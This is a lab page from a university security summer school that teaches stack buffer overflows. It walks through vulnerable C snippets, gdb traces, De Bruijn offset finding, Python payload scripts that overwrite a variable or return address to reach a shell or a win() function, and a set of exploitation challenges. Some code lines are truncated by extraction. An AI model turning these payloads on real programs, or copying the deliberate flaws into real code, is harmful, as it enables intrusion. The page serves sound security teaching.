====== 0x05. Buffer Exploitation ====== ===== Resources ===== [[https://security.cs.pub.ro/summer-school/res/slides/06-buffer-management.pdf|Session 5 slides]] [[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-skel.zip|Session's tutorials and challenges archive]] [[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|Session's code snippets]]. /*[[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-full.zip|Session's solutions]]*/ ===== Tutorials ===== ===== Buffers ===== A buffer is an area of contiguous data in memory, determined by a starting address, contents and length. Understanding how buffers are used (or misused) is vital for both offensive and defensive purposes. In C, we can declare a buffer of bytes as a char array, as follows: char local_buffer[32]; Which results in the following assembly code: 080483db
: 80483db: 55 push ebp 80483dc: 89 e5 mov ebp,esp 80483de: 83 ec 20 sub esp,0x20 80483e1: b8 00 00 00 00 mov eax,0x0 80483e6: c9 leave 80483e7: c3 ret Notice that buffer allocation is done by simply subtracting its intended size from the current stack pointer (''sub esp, 0x20''). This simply reserves space on the stack (remember that on x86 the stack grows "upwards", from higher addresses to lower ones). A compiler may allocate more space on the stack than explicitly required. For example, on a 64-bit machine with stack canary enabled (an additional 64-bit value is implicitly placed between buffers and the return address - more on that in future sessions), declaring either ''char s[32]'' or ''char s[40]'' might yield ''sub rsp, 0x30'' to align buffers at 16 bytes thresholds. To exploit a program, the C source code may not be a good enough reference point. Only disassembling the executable will provide relevant information. Buffers can be also be stored in other places in memory, such as the ''heap'', ''.bss'' or ''.rodata''. You can find the following code snippet [[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|here]] (''buffers/buffers.c''). #include #include char g_buf_init_zero[32] = {0}; /* g_buf_init_vals[5..31] will be 0 */ char g_buf_init_vals[32] = {1, 2, 3, 4, 5}; const char g_buf_const[32] = "Hello, world\n"; int main(void) { char l_buf[32]; static char s_l_buf[32]; char *heap_buf = malloc(32); free(heap_buf); return 0; } Let's have a look at the executable sections: $ readelf -S buffers [Nr] Name Type Addr Off Size ES Flg Lk Inf Al ... [16] .rodata PROGBITS 080485a0 0005a0 000040 00 A 0 0 32 ... [24] .data PROGBITS 0804a020 001020 000040 00 WA 0 0 32 [25] .bss NOBITS 0804a060 001060 000060 00 WA 0 0 32 ... Key to Flags: W (write) A (alloc) And the address of each symbol (buffer in this case): 080485c0 R g_buf_const 0804a040 D g_buf_init_vals 0804a080 B g_buf_init_zero 0804a0a0 b s_l_buf.2387 Key to Flags: R (symbol is read-only) D (symbol in initialized data section) B (symbol in BSS data section) Uppercase and lowercase flags have the same meaning. A lowercase flag means variable is not visible outside the module Alternatively, you can use gdb to extract information on each symbol: gdb-peda$ p &g_buf_const $1 = ( *) 0x80485c0 Using this information you can map each symbol to a data section. For example, the address of g_buf_const is ''0x80485c0'', so it is placed in the .rodata section ''addr=0x080485a0; size=0x40''. Non-static local variables and dynamically allocated buffers cannot be seen in the executable (they have meaning only at runtime, because they are allocated on the stack or heap when the code reaches a certain point. Let's inspect the execution right before calling free() and see where the heap buffer will be placed: gdb-peda$ ----------------------------------registers-----------------------------------] EAX: 0x804b160 --> 0x0 EBX: 0x0 ECX: 0x21e79 EDX: 0x804b160 --> 0x0 ESI: 0xf7fb4000 --> 0x1d4d6c EDI: 0x0 EBP: 0xffffd798 --> 0x0 ESP: 0xffffd750 --> 0x804b160 --> 0x0 EIP: 0x80484e8 (: call 0x8048350 ) EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x80484df : mov DWORD PTR [ebp-0x30],eax 0x80484e2 : sub esp,0xc 0x80484e5 : push DWORD PTR [ebp-0x30] => 0x80484e8 : call 0x8048350 0x80484ed : add esp,0x10 0x80484f0 : mov eax,0x0 0x80484f5 : mov edx,DWORD PTR [ebp-0xc] 0x80484f8 : xor edx,DWORD PTR gs:0x14 Guessed arguments: arg[0]: 0x804b160 --> 0x0 [------------------------------------stack-------------------------------------] 0000| 0xffffd750 --> 0x804b160 --> 0x0 0004| 0xffffd754 --> 0xffffd9e0 ("examples/buffers") 0008| 0xffffd758 --> 0xf7e0f049 (add ebx,0x1a4fb7) 0012| 0xffffd75c --> 0xf7fb7748 --> 0x0 0016| 0xffffd760 --> 0xf7fb4000 --> 0x1d4d6c 0020| 0xffffd764 --> 0xf7fb4000 --> 0x1d4d6c 0024| 0xffffd768 --> 0x804b160 --> 0x0 0028| 0xffffd76c --> 0xf7e0f1ab (add esp,0x10) [------------------------------------------------------------------------------] Legend: code, data, rodata, value gdb-peda$ x/wx $ebp-0x30 0xffffd768: 0x0804b160 gdb-peda$ vmm Start End Perm Name ... 0x0804b000 0x0806d000 rw-p [heap] ... The gdb-peda ''vmm'' command displays the virtual memory map of the process; this can be used to easily inspect the addresses and permissions of each memory region. You can find the following code snippet [[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|here]] (''init_buffer/init_buffer.c''). Let's fill our stack buffer with some values and disassemble the binary: char local_buffer[32]; unsigned int i = 0; for (i = 0; i < 32; i++) { local_buffer[i] = i; } 080483db
: 80483db: 55 push ebp 80483dc: 89 e5 mov ebp,esp 80483de: 83 ec 24 sub esp,0x24 ; reserve space for both the local_buffer (0x20) and i (0x4) 80483e1: c7 45 fc 00 00 00 00 mov DWORD PTR [ebp-0x4],0x0 ; initialize i 80483e8: c7 45 fc 00 00 00 00 mov DWORD PTR [ebp-0x4],0x0 ; redundant unoptimized compiler logic 80483ef: eb 13 jmp 8048404 ; goto the end of loop 80483f1: 8b 45 fc mov eax,DWORD PTR [ebp-0x4] ; get value of 'i' in eax 80483f4: 89 c1 mov ecx,eax ; save 'i' in ecx 80483f6: 8d 55 dc lea edx,[ebp-0x24] ; load the address of 'local_buffer' in edx 80483f9: 8b 45 fc mov eax,DWORD PTR [ebp-0x4] ; get 'i' 80483fc: 01 d0 add eax,edx ; compute address of 'local_buffer+i' in eax 80483fe: 88 08 mov BYTE PTR [eax],cl ; store 'i' at *(local_buffer+i) 8048400: 83 45 fc 01 add DWORD PTR [ebp-0x4],0x1 ; increment 'i' 8048404: 83 7d fc 1f cmp DWORD PTR [ebp-0x4],0x1f ; 'i==31'? 8048408: 76 e7 jbe 80483f1 ; continue loop if below or equal or fall through if above 804840a: b8 00 00 00 00 mov eax,0x0 804840f: c9 leave 8048410: c3 ret Notice that now we subtract ''0x24'' from the stack pointer, since this time we also need to reserve space for the ''unsigned integer'' used as an index. Similar to how arguments are referenced using ''ebp'', so are the local variables. Since in most cases the value of ''ebp'' stays fixed throughout the execution of a function, you can easily track local variables and buffers by mapping names to offsets (i.e. 'i' to '-0x4', 'local_buffer' to '-0x24' and so on). Intermediary positions within the buffer are almost always computed by using the base address and adding an offset to it. Values at offsets relative to ''ebp'' have their meaning defined by their use, instead of static names. This implies that even if the allocated space is 0x24, the compiler may reorder local buffers, and space may be interpreted as either 'i' at 'ebp-0x4' and 'local_buffer' at 'ebp-0x24', or 'i' at 'ebp-0x24' and 'local_buffer' at 'ebp-0x20'. Finally, lets add one more interesting change to our code: char local_buffer2[30]; char local_buffer[2]; unsigned int i = 0; for (i = 0; i < 32; i++) { local_buffer[i] = i; } Can you guess how the resulting code will look like, disassembled? Where are we writing to? ==== Stack buffer overflows ==== As we have seen in previous sessions, the stack serves multiple purposes: * Passing function arguments from the caller to the callee * Storing local variables for functions * Temporarily saving register values before a call * Saving the return address and old frame pointer Our previous example clearly showcases the fact that even though in an abstract sense, different buffers are separate from one another, ultimately they are just some regions of memory which do not have any intrinsic identification or associated size. This is the reason why in some higher level languages it is not possible to write beyond the bounds of containers - the size is integrated into the object itself. But in our case, bounds are unchecked, therefore it is up to the programmer to code carefully. This includes checking for any overflows and using **safe functions**. Unfortunately, many functions in the standard C library, particularly those which work with strings and read user input, are unsafe - nowadays, the compiler will issue warnings when encountering them. What can happen in the event that we write outside the bounds of a stack buffer? You can find the following code snippet [[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|here]] (''buffer_overflow/buffer_overflow.c''). void f(char *buf) { unsigned int i = 0; for (i = 0; i < 100; i++) { buf[i] = i; } } int main(int argc, char* argv[]) { char local_buffer[32]; f(local_buffer); return 0; } $ ./buffer_overflow Segmentation fault (core dumped) What happened? Let's try to find the cause starting with the call of ''f'': gdb-peda$ b *0x08048430 Breakpoint 1 at 0x8048430 gdb-peda$ r [----------------------------------registers-----------------------------------] EAX: 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg") EBX: 0x0 ECX: 0x38f575fd EDX: 0xffffd684 --> 0x0 ESI: 0xf7fb4000 --> 0x1d4d6c EDI: 0x0 EBP: 0xffffd658 --> 0x0 ESP: 0xffffd634 --> 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg") EIP: 0x8048430 (: call 0x80483f6 ) EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x8048429 : sub esp,0x20 0x804842c : lea eax,[ebp-0x20] 0x804842f : push eax => 0x8048430 : call 0x80483f6 0x8048435 : add esp,0x4 0x8048438 : mov eax,0x0 0x804843d : leave 0x804843e : ret Guessed arguments: arg[0]: 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg") arg[1]: 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg") [------------------------------------stack-------------------------------------] 0000| 0xffffd634 --> 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg") 0004| 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg") 0008| 0xffffd63c --> 0x8048461 (<__libc_csu_init+33>: lea eax,[ebx-0xf4]) 0012| 0xffffd640 --> 0xf7fe59b0 (push ebp) 0016| 0xffffd644 --> 0x0 0020| 0xffffd648 --> 0x8048449 (<__libc_csu_init+9>: add ebx,0x1bb7) 0024| 0xffffd64c --> 0x0 0028| 0xffffd650 --> 0xf7fb4000 --> 0x1d4d6c [------------------------------------------------------------------------------] Legend: code, data, rodata, value Breakpoint 1, 0x08048430 in main () gdb-peda$ ni [----------------------------------registers-----------------------------------] EAX: 0xffffd69b --> 0x63 ('c') EBX: 0x0 ECX: 0x38f575fd EDX: 0x63 ('c') ESI: 0xf7fb4000 --> 0x1d4d6c EDI: 0x0 EBP: 0xffffd658 (" !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc") ESP: 0xffffd634 --> 0xffffd638 --> 0x3020100 EIP: 0x8048435 (: add esp,0x4) EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x804842c : lea eax,[ebp-0x20] 0x804842f : push eax 0x8048430 : call 0x80483f6 => 0x8048435 : add esp,0x4 0x8048438 : mov eax,0x0 0x804843d : leave 0x804843e : ret 0x804843f: nop [------------------------------------stack-------------------------------------] 0000| 0xffffd634 --> 0xffffd638 --> 0x3020100 0004| 0xffffd638 --> 0x3020100 0008| 0xffffd63c --> 0x7060504 0012| 0xffffd640 --> 0xb0a0908 0016| 0xffffd644 --> 0xf0e0d0c 0020| 0xffffd648 --> 0x13121110 0024| 0xffffd64c --> 0x17161514 0028| 0xffffd650 --> 0x1b1a1918 [------------------------------------------------------------------------------] Legend: code, data, rodata, value 0x08048435 in main () gdb-peda$ b *0x0804843e Breakpoint 2 at 0x0804843e gdb-peda$ c Continuing. [----------------------------------registers-----------------------------------] EAX: 0x0 EBX: 0x0 ECX: 0x38f575fd EDX: 0x63 ('c') ESI: 0xf7fb4000 --> 0x1d4d6c EDI: 0x0 EBP: 0x23222120 (' !"#') ESP: 0xffffd65c ("$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc") EIP: 0x804843e (: ret) EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x8048435 : add esp,0x4 0x8048438 : mov eax,0x0 0x804843d : leave => 0x804843e : ret 0x804843f: nop 0x8048440 <__libc_csu_init>: push ebp 0x8048441 <__libc_csu_init+1>: push edi 0x8048442 <__libc_csu_init+2>: push esi [------------------------------------stack-------------------------------------] 0000| 0xffffd65c ("$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc") 0004| 0xffffd660 ("()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc") 0008| 0xffffd664 (",-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc") 0012| 0xffffd668 ("0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc") 0016| 0xffffd66c ("456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc") 0020| 0xffffd670 ("89:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc") 0024| 0xffffd674 ("<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc") 0028| 0xffffd678 ("@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc") [------------------------------------------------------------------------------] Legend: code, data, rodata, value Breakpoint 2, 0x0804843e in main () gdb-peda$ ni [----------------------------------registers-----------------------------------] EAX: 0x0 EBX: 0x0 ECX: 0x38f575fd EDX: 0x63 ('c') ESI: 0xf7fb4000 --> 0x1d4d6c EDI: 0x0 EBP: 0x23222120 (' !"#') ESP: 0xffffd660 ("()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc") EIP: 0x27262524 ("$%&'") EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] Invalid $PC address: 0x27262524 [------------------------------------stack-------------------------------------] 0000| 0xffffd660 ("()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc") 0004| 0xffffd664 (",-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc") 0008| 0xffffd668 ("0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc") 0012| 0xffffd66c ("456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc") 0016| 0xffffd670 ("89:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc") 0020| 0xffffd674 ("<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc") 0024| 0xffffd678 ("@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc") 0028| 0xffffd67c ("DEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc") [------------------------------------------------------------------------------] Legend: code, data, rodata, value 0x27262524 in ?? () It seems that the return address of ''main'', along with a lot more of the stack, gets overwritten with the characters that we write "in the buffer". The program then tries to "return to $%&'" ($%&' is the ASCII representation of little endian 0x27262524), which is an unmapped address. This ultimately triggers a page fault, upon which the operating system signals a ''SIGSEGV'' and terminates the process. A buffer overflow is an anomaly caused by writing beyond the bounds of a buffer; it is not necessarily a vulnerability. The presence of a buffer overflow can lead to strange behavior, a crash, arbitrary code execution or absolutely **nothing**. ==== Diverting code execution ==== We attempted to use the wonderful ''gets'' function, but the compiler does not generate it and the man page explicitly says: DESCRIPTION Never use this function. gets() reads a line from stdin into the buffer pointed to by s until either a terminating newline or EOF, which it replaces with a null byte ('\0'). No check for buffer overrun is performed (see BUGS below). However, we can still handcraft our own vulnerable scenario. Let's try to divert the code execution by using a buffer overflow vulnerability. You can find the following code snippet [[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|here]] (''buffer_overflow_var/buffer_overflow_var.c''). #include #include void f(char* buf) { fgets(buf, 100, stdin); } int main(int argc, char* argv[]) { int critical_variable = 0; char local_buffer[32]; f(local_buffer); if (critical_variable == 1337) { printf("Oh dear, you shouldn't be here!\n"); system("/bin/sh"); } return 0; } Our ''local_buffer'' is dangerously close to that critical variable. Let's see if we can overwrite it. We need 32 bytes of input to fill our buffer + 4 bytes for the integer. $ python -c "print 'A'*32 + '1337'" | ./buffer_overflow_var Nothing happened. Let's find out why. We'll save our payload to a file and run ''buffer_overflow_var'' under gdb, using the file as input: $ python -c "print 'A'*32 + '1337'" > payload $ gdb ./buffer_overflow_var gdb-peda$ b *0x80484fc Breakpoint 1 at 0x80484fc gdb-peda$ r < payload Starting program: ./buffer_overflow_var < payload [----------------------------------registers-----------------------------------] EAX: 0xffffd5dc ('A' , "1337\n") EBX: 0x0 ECX: 0xf7fb589c --> 0x0 EDX: 0xffffd5dc ('A' , "1337\n") ESI: 0xf7fb4000 --> 0x1d4d6c EDI: 0x0 EBP: 0xffffd608 --> 0x0 ESP: 0xffffd5d0 --> 0xf7fb4000 --> 0x1d4d6c EIP: 0x80484fc (: cmp DWORD PTR [ebp-0xc],0x539) EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x80484f3 : push eax 0x80484f4 : call 0x80484b6 0x80484f9 : add esp,0x10 => 0x80484fc : cmp DWORD PTR [ebp-0xc],0x539 0x8048503 : jne 0x8048525 0x8048505 : sub esp,0xc 0x8048508 : push 0x80485c0 0x804850d : call 0x8048360 [------------------------------------stack-------------------------------------] 0000| 0xffffd5d0 --> 0xf7fb4000 --> 0x1d4d6c 0004| 0xffffd5d4 --> 0xf7fb4000 --> 0x1d4d6c 0008| 0xffffd5d8 --> 0x0 0012| 0xffffd5dc ('A' , "1337\n") 0016| 0xffffd5e0 ('A' , "1337\n") 0020| 0xffffd5e4 ('A' , "1337\n") 0024| 0xffffd5e8 ('A' , "1337\n") 0028| 0xffffd5ec ('A' , "1337\n") [------------------------------------------------------------------------------] Legend: code, data, rodata, value Breakpoint 1, 0x080484fc in main () gdb-peda$ x/wx $ebp-0xc 0xffffd5fc: 0x37333331 gdb-peda$ x/s $ebp-0xc 0xffffd5fc: "1337\n" We usually use high level scripting languages, such as **python** to craft payloads. For example, to generate 32 ''A''s, we just use '''A'*32''. We can observe two things: * We actually wrote the __string__ ''1337'', which is ''0x37333331'', instead of the actual value ''1337'' or ''0x539'' in hex. * We missed the fact that x86 is Little Endian, meaning that we should write the integer value into memory starting with the least significant byte first. An easy way to overcome this is to write a small script which will generate the required payload for us, as follows: #!/usr/bin/env python import struct buflen = 32 payload = 'A' * buflen payload += struct.pack(' Note the use of ''struct.pack'' and ''struct.unpack'' when working with binary data that needs to be stored in various configurations. Let's test our new payload: $ cat payload | ./buffer_overflow_var Oh dear, you shouldn't be here! It seems to alter the code flow as we wanted to, but it doesn't seem to spawn a (new) shell. What gives? The gist of the issue is the fact that the binary reads from ''stdin'' in one "chomp". Our newly spawned shell has no input to read, and exits before we get a change to input any commands (similarly to how the shell behaves when sending ''Ctrl-D'' - ''end of input''. We can use the following clever trick to keep ''stdin'' open for further user interaction: $ cat payload - | ./buffer_overflow_var Oh dear, you shouldn't be here! date Tue Jun 27 22:17:48 EEST 2017 whoami root We used the ''cat filename -| ./binary'' trick to concatenate the contents of ''filename'' with the ''standard input''. Once EOF is reached, you can continue feeding data to the binary via the standard input. ==== Overwriting the stored return address ==== Let's wrap up our stack smashing adventure by changing the code flow through overwriting the return address stored on the stack. You can find the following code snippet [[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|here]] (''buffer_overflow_ret/buffer_overflow_ret.c''). #include void win() { printf("Well done!\n"); } void f() { printf("Nothing to see here\n"); } void get_message(char *buf) { fgets(buf, 100, stdin); } int main(int argc, char* argv[]) { char local_buffer[32]; printf("Please leave a message: "); get_message(local_buffer); f(); return 0; } First, let's trigger the program to crash like in the previous example: $ ./buffer_overflow_ret Please leave a message: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Nothing to see here Segmentation fault (core dumped) However, we do not know at which point relative to the start of our buffer the saved return address gets overwritten. We can either compute it by looking at the disassembly and the stack layout or by using a De Bruijn pattern in PEDA. Such a pattern contains unique groups of 4 characters, meaning that each group will have a unique offset within the pattern. $ gdb ./buffer_overflow_ret gdb-peda$ pattc 100 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL' gdb-peda$ r Starting program: ./buffer_overflow_ret Please leave a message: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALL Nothing to see here Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] EAX: 0x0 EBX: 0x0 ECX: 0x804b160 ("Nothing to see here\nge: ") EDX: 0xf7fb5890 --> 0x0 ESI: 0xf7fb4000 --> 0x1d4d6c EDI: 0x0 EBP: 0x61414145 ('EAAa') ESP: 0xffffd620 ("AFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA") EIP: 0x41304141 ('AA0A') EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] Invalid $PC address: 0x41304141 [------------------------------------stack-------------------------------------] 0000| 0xffffd620 ("AFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA") 0004| 0xffffd624 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA") 0008| 0xffffd628 ("AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA") 0012| 0xffffd62c ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA") 0016| 0xffffd630 ("2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA") 0020| 0xffffd634 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA") 0024| 0xffffd638 ("A3AAIAAeAA4AAJAAfAA5AAKAAgAA6AA") 0028| 0xffffd63c ("IAAeAA4AAJAAfAA5AAKAAgAA6AA") [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x41304141 in ?? () gdb-peda$ patto AA0A AA0A found at offset: 40 This tells us that we need to write 40 characters into the buffer and then the next 4 bytes will overwrite the return address. Let's test this, again, by writing a script that can generate a payload, which we can easily tailor to our needs. First, let's see if we can reliably change the value of the return address. We'll attempt to write ''0xdeadbeef'' first. #!/usr/bin/env python import struct payload = 'A' * 36 payload += struct.pack(' gdb-peda$ r < payload Starting program: ./buffer_overflow_ret < payload Please leave a message: Nothing to see here Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] EAX: 0x0 EBX: 0x0 ECX: 0x804b160 ("Please leave a message: Nothing to see here\n") EDX: 0xf7fb5890 --> 0x0 ESI: 0xf7fb4000 --> 0x1d4d6c EDI: 0x0 EBP: 0x61616161 ('aaaa') ESP: 0xffffd620 --> 0x0 EIP: 0xdeadbeef EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] Invalid $PC address: 0xdeadbeef [------------------------------------stack-------------------------------------] 0000| 0xffffd620 --> 0x0 0004| 0xffffd624 --> 0xffffd6b4 --> 0xffffd859 ("./buffer_overflow_ret") 0008| 0xffffd628 --> 0xffffd6bc --> 0xffffd8cb ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg") 0012| 0xffffd62c --> 0xffffd644 --> 0x0 0016| 0xffffd630 --> 0x1 0020| 0xffffd634 --> 0x0 0024| 0xffffd638 --> 0xf7fb4000 --> 0x1d4d6c 0028| 0xffffd63c --> 0xf7fe575a (add edi,0x178a6) [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0xdeadbeef in ?? () Excellent. Now we can replace ''0xdeadbeef'' with the address of the ''win'' function. ... payload += struct.pack(' $ cat payload | ./buffer_overflow_ret Please leave a message: Nothing to see here Well done! Segmentation fault (core dumped) Our job here is done. Now it's time for you to smash some stacks. Keep in mind that buffer overflows are not the only type of vulnerability, but they are very common. ===== Challenges ===== Before venturing forth, consider the following roadmap when approaching a challenge: * disassemble the binary * identify the stack buffer * identify functions which work with buffers * see if there are any mismatches (declared size vs. index used) * dynamic analysis in GDB; inject De Bruijn patterns whenever input is read * determine offset in buffer * write a script which generates a payload to reliably crash/exploit the target * keep stdin/connection open for further interaction after obtaining a shell * ??? * PROFIT Use the following [[http://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-skel.zip|archive]]. ==== 01. Parrot ==== Some programs feature a "stack smashing protection" in the form of stack canaries, that is, values kept on the stack which are checked before returning from a function. If the value has changed, then the "canary" can conclude that stack data has been corrupted throughout the execution of the current function. We have implemented our very own ''parrot''. Can you avoid it somehow? Values are little endian. So if you want to send ''0xabcd'' you would send it as ''\xcd\xab\x00\x00''. When providing input to a program and wanting to maintain connection to its standard input, run: cat payload - | ./program Or, if you have a payload generator program such as ''payload.py'', run: cat <(python payload.py) - | ./program ==== 02. Indexing ==== More complex programs require some form of protocol or user interaction. This is where the great [[https://github.com/Gallopsled/pwntools|pwntools]] come in. Here's an interactive script to get you started: #!/usr/bin/env python from pwn import * p = process('./indexing') p.recvuntil('Index: ') p.sendline() # TODO (must be string) # Give value p.recvuntil('Value: ') p.sendline() # TODO (must be string) p.interactive() Go through GDB when aiming to solve this challenge. As all input values are strings, you can input them at the keyboard and follow their effect in GDB. You can inspect the behavior of a program for a given input by doing: cat payload | strace ./program That is, you will trace the program being exploited and see ''read()'' or other calls and how they fare for a given input. ==== 03. Smashthestack Level7 ==== Now you can tackle a real challenge. See if you can figure out how you can get a shell from this one. There's an integer overflow + buffer overflow in the program. What are the four 32 bit values that multiplied by ''4'' give you, let's say, ''256''? In order to run a program that receives command line arguments under gdb, you can do the following: $ gdb ./main gdb$ set args arg1 arg2 arg3 gdb$ start ==== 04. Neighbourly ==== Let's overwrite a structure's function pointer using a buffer overflow in its vicinity. The principle is the same. The ''ptext'' field of the structure is a function pointer. Overwrite it with the address of the ''win()'' function. ==== 05. Uninitialized ==== There's something faulty in the program, and it's **not** an buffer overflow. Provide the proper input to the executable and get a shell. Do **not** use pwntools for this task. ==== 06: Bonus: Uninitialized 2 ==== There's a small update to the ''uninitialized'' executable and you need to update your solution. Use ''ltrace'' to understand what's happening differently. Create a pwntools-based script to solve both the initial executable and the bonus one. ==== 05. Bonus: Birds ==== Time for a more complex challenge. Be patient and don't speed through it.